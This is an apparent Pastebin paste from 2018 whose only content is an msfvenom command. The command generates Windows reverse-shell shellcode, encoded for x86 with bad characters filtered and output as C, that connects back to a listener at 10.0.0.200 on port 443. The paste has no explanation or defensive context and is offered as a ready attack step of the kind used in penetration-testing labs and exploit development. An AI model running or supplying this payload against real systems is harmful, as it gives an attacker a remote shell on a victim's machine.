Advertisement
Guest User

Untitled

a guest
May 20th, 2018
94
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.10 KB | None | 0 0
  1. msfvenom -p windows/shell_reverse_tcp
  2. LHOST=10.0.0.200 LPORT=443 –e x86 –b ‘\x00\x0a\x0d’ –f c
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement